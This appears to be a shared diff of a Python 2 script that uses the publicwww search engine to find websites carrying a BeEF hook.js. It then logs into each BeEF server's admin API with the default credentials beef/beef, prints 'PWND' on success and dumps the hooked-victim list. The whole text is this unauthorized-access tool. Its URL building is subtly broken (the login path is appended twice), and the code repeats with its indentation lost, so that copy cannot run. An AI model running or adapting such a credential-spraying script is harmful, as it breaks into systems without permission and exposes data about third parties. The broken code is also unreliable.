tmap · September 27, 2018 10:48
diff --git a/tritip.py b/tritip.py
 import requests
 from contextlib import closing
 import csv
 import sys


 api_key = "publicwww_apikey"
 search_for_hook_js="%223000%2Fhook.js%22"
 try:
 	req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key
 	print req
 	with closing(requests.get(req, stream=True)) as r:
 		reader = csv.reader(r.iter_lines(), delimiter=';', quotechar='"')
 		for row in reader:
 			try:
 				stripped_url= row[2].split('/hook.js', 1)[0]
 				url_to_run=stripped_url+'/api/admin/login'
 				print stripped_url
 				r = requests.post(url_to_run+"/api/admin/login", json = {'username':'beef', 'password':'beef'})
 				if r.status_code==200:
 					print 'PWND',stripped_url
 					data=r.json()
 					token=data['token']
 					rg = requests.get(url_to_run+'/api/hooks?token='+str(token))
 					print rg.text
 				elif r.status_code==401:
 					print 'Wrong passwd',stripped_url
 				else:
 					continue
 			except:
 				pass

 except Exception as e:
 	print 'Error: %s' % e
 	sys.exit(1)
	import requests
	from contextlib import closing
	import csv
	import sys


	api_key = "publicwww_apikey"
	search_for_hook_js="%223000%2Fhook.js%22"
	try:
	req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key
	print req
	with closing(requests.get(req, stream=True)) as r:
	reader = csv.reader(r.iter_lines(), delimiter=';', quotechar='"')
	for row in reader:
	try:
	stripped_url= row[2].split('/hook.js', 1)[0]
	url_to_run=stripped_url+'/api/admin/login'
	print stripped_url
	r = requests.post(url_to_run+"/api/admin/login", json = {'username':'beef', 'password':'beef'})
	if r.status_code==200:
	print 'PWND',stripped_url
	data=r.json()
	token=data['token']
	rg = requests.get(url_to_run+'/api/hooks?token='+str(token))
	print rg.text
	elif r.status_code==401:
	print 'Wrong passwd',stripped_url
	else:
	continue
	except:
	pass

	except Exception as e:
	print 'Error: %s' % e
	sys.exit(1)